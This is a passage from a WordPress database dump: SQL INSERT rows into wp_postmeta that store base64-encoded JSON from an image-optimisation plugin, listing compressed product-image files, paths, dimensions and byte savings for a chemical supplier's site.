94LWZwZy0wMjgtMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo3NzcyLCJ0aW1lIjoxNDgzNTUxMjUwLCJpZCI6MTkyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU1MTI1MywiaWQiOjE5Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MTIsInRpbWUiOjE0ODM1NTEyNTYsImlkIjoxOTI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDMwLCJ0aW1lIjoxNDgzNTUxMjU5LCJpZCI6MTkyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExMTQsInRpbWUiOjE0ODM1NTEyNjMsImlkIjoxOTI4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo0NTYsInRpbWUiOjE0ODM1NTEyNjYsImlkIjoxOTI4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy0wMjgtMS00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctMDI4LTEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLTAyOC0xLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MDUsInRpbWUiOjE0ODM1NTEyNzAsImlkIjoxOTI4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28976, 1927, 'wpfc_optimisation_reduction', '9217'); 
INSERT INTO `wp_postmeta` VALUES (28977, 1927, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsIndpZHRoIjo2MDAwLCJoZWlnaHQiOjQwMDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTEyNzUsImlkIjoiMTkyNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1ODAsInRpbWUiOjE0ODM1NTEyNzgsImlkIjoxOTI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MTAxNywidGltZSI6MTQ4MzU1MTI4MiwiaWQiOjE5Mjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTMuanBnIiwicmVkdWN0aW9uIjo5ODYsInRpbWUiOjE0ODM1NTEyODYsImlkIjoxOTI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjguanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjoyOTczLCJ0aW1lIjoxNDgzNTUxMjkxLCJpZCI6MTkyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUyOCwidGltZSI6MTQ4MzU1MTI5NCwiaWQiOjE5Mjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzgsInRpbWUiOjE0ODM1NTEyOTgsImlkIjoxOTI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDk4LCJ0aW1lIjoxNDgzNTUxMzAxLCJpZCI6MTkyN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjkzMCwidGltZSI6MTQ4MzU1MTMwNSwiaWQiOjE5Mjd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5NSwidGltZSI6MTQ4MzU1MTMwOCwiaWQiOjE5Mjd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY3MiwidGltZSI6MTQ4MzU1MTMxMiwiaWQiOjE5Mjd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28978, 1926, 'wpfc_optimisation_reduction', '13011'); 
INSERT INTO `wp_postmeta` VALUES (28979, 1926, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUxMzE2LCJpZCI6IjE5MjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTUxMzIwLCJpZCI6MTkyNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEyMzcsInRpbWUiOjE0ODM1NTEzMjMsImlkIjoxOTI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTEwOCwidGltZSI6MTQ4MzU1MTMyNywiaWQiOjE5MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjY0NDAsInRpbWUiOjE0ODM1NTEzMzIsImlkIjoxOTI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTAxLCJ0aW1lIjoxNDgzNTUxMzM1LCJpZCI6MTkyNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU1MTMzOSwiaWQiOjE5MjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LW90aGVyLWdyZWFzZS1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtb3RoZXItZ3JlYXNlLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1vdGhlci1ncmVhc2Utb2lsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NDksInRpbWUiOjE0ODM1NTEzNDIsImlkIjoxOTI2fSx7ImZp